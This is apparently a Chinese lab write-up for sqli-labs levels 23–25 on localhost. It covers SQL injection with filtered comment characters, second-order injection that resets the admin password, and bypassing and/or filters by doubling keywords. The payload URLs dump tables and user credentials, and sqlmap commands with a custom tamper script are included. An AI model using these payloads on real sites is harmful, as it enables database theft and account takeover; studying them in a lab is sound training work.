sqli-lab靶场学习七Less23-25关键字被过滤二次注入
sqli-lab靶场学习(七)——Less23-25(关键字被过滤、二次注入)
前言
之前的每一关,我们都是在末尾加上注释符,屏蔽后面的语句,这样我们只要闭合了区间之后,差不多就是为所欲为的状态。但如果注释符不生效的情况下,又该如何呢?
Less23(注释符被过滤)
第25关,这关分析源码,它是过滤了请求的注释符“–”和“#”,所以这里不能用注释符注释后面的语句。但对本关注入来说,不成问题。
本关是测试可知是单引号闭合:
http://localhost/sqli-labs/less-23/?id=1' or'
接着就按照Less1的套路来就可以了。测试列数:
http://localhost/sqli-labs/less-23/?id=1' union select 1'
列数不是1,经测试到3时没报错:
http://localhost/sqli-labs/less-23/?id=1' union select 1,2,3'
接下来测试是否前端可以回显:
http://localhost/sqli-labs/less-23/?id=-1' union select 1,2,3'
测试联合注入可以回显。那么就开始爆数据库名:
http://localhost/sqli-labs/less-23/?id=-1' union select 1,database(),3'
然后爆表:
http://localhost/sqli-labs/less-23/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' '
爆字段:
http://localhost/sqli-labs/less-23/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' '
爆用户名密码:
http://localhost/sqli-labs/less-23/?id=-1' union select 1,group_concat(username),group_concat(password) from security.users where 1='1
Less24(二次注入)
二次注入的概念,是某个地方过滤了特殊字符等,但是攻击者可以在另一个地方把带特殊字符的信息写入数据库,当某个地方需要校验时,程序从数据库读取带特殊字符的信息,可以形成sql注入。最典型的例子,就是网站注册用户时,通过输入带特殊字符的用户名或密码,到了登陆时程序匹配时被特殊字符注入。
分析源码,注入点在pass_change.php中:
如果我们在变量$username的位置闭合,那不需要检测该账号当前的密码。
进入创建新用户。创建用户是常见二次注入点。接下来创建用户名“admin’#”,密码:1。然后重新登陆:
接着随便输入当前密码,然后输入新密码为"abc"。接着logout后重新登陆时,输入admin/abc。发现admin密码已经被改为abc了。这就是二次注入。
Less25(绕过and、or)
25关在于绕过关键字and和or。页面下方的Hint会提示过滤后的情况:
http://localhost/sqli-labs/less-25/?id=1' or 1=1 %23
显然or被过滤掉了。那如何避免被过滤呢? 可以采用双写,比如说and写成aandnd,or写成oorr,这样字符串过滤时,过滤掉中间的关键字后,刚好恢复成and和or。尝试输入:
http://localhost/sqli-labs/less-25/?id=1' oorr 1=1 %23
本关虽然我们不需要使用and和or关键字,但是其他单词中包含and和or的话,也是需要绕过的。基本上按照第一关的思路就够了:
#联合注入回显2,、3列
http://localhost/sqli-labs/less-25/?id=-1' union select 1,2,3 %23
#查数据库名
http://localhost/sqli-labs/less-25/?id=-1' union select 1,database(),3 %23
#爆表名,information的or会被过滤,需要双写
http://localhost/sqli-labs/less-25/?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database()%23
#爆列名
http://localhost/sqli-labs/less-25/?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='users' %23
#爆用户名密码,password的or需要双写
http://localhost/sqli-labs/less-25/?id=-1' union select 1,group_concat(username),group_concat(passwoorrd) from users %23sqlmap方法
第23关虽然注释符被过滤,但对sqlmap来说不需要什么特殊处理,因为基本注入语句中就已经带这类注入方法,所以还是按老套路就好了:
sqlmap -u http://127.0.0.1/sqli-labs/less-23/?id=1 --current-db
sqlmap -u http://127.0.0.1/sqli-labs/less-23/?id=1 -D security --tables
sqlmap -u http://127.0.0.1/sqli-labs/less-23/?id=1 -D security -T users --columns
sqlmap -u http://127.0.0.1/sqli-labs/less-23/?id=1 -D security -T users -C "username,password" --dump第24关因为是二次注入,因为不能直接用sqlmap来处理
第25关因为过滤了or关键字,所以要么把密码写成passwoorrd,要么使用tamper绕过。
写成passwoorrd:
sqlmap -u http://127.0.0.1/sqli-labs/less-25/?id=1 --current-db
sqlmap -u http://127.0.0.1/sqli-labs/less-23/?id=1 -D security --tables
sqlmap -u http://127.0.0.1/sqli-labs/less-23/?id=1 -D security -T users --columns
sqlmap -u http://127.0.0.1/sqli-labs/less-25/?id=1 -D security -T users -C "username,passwoorrd" --dump写tamper就相对复杂一点了,首先要自定义一个tamper文件,这里在sqlmap目录下的tamper目录下新建文件shuangxie.py
def tamper(payload, **kwargs):
payload = payload.replace("and","aandnd")
payload = payload.replace("or","oorr")
return payload这里很简单,单纯对payload中所有and和or进行双写。这样执行爆用户名密码的语句就不需要双写了:
sqlmap -u http://127.0.0.1/sqli-labs/less-25/?id=1 -D security -T users -C "username,password" --dump --tamper shuangxie.py小结
本文的注入已经逐步向sql注入高阶迈进。后面还会逐渐遇到需要各种绕过的情形。另外二次注入也是常见的注入场景,每当遇到注册新用户的时候,都可以考虑是否存在这种注入点。